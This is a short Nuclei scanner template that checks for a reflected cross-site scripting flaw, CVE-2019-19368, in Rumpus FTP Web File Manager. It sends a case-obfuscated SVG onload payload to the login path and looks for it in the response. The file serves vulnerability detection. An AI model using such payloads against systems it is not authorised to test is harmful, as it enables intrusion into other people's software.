nuclei-templates/cves/CVE-2019-19368.yaml

21 lines
405 B
YAML

id: cve-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body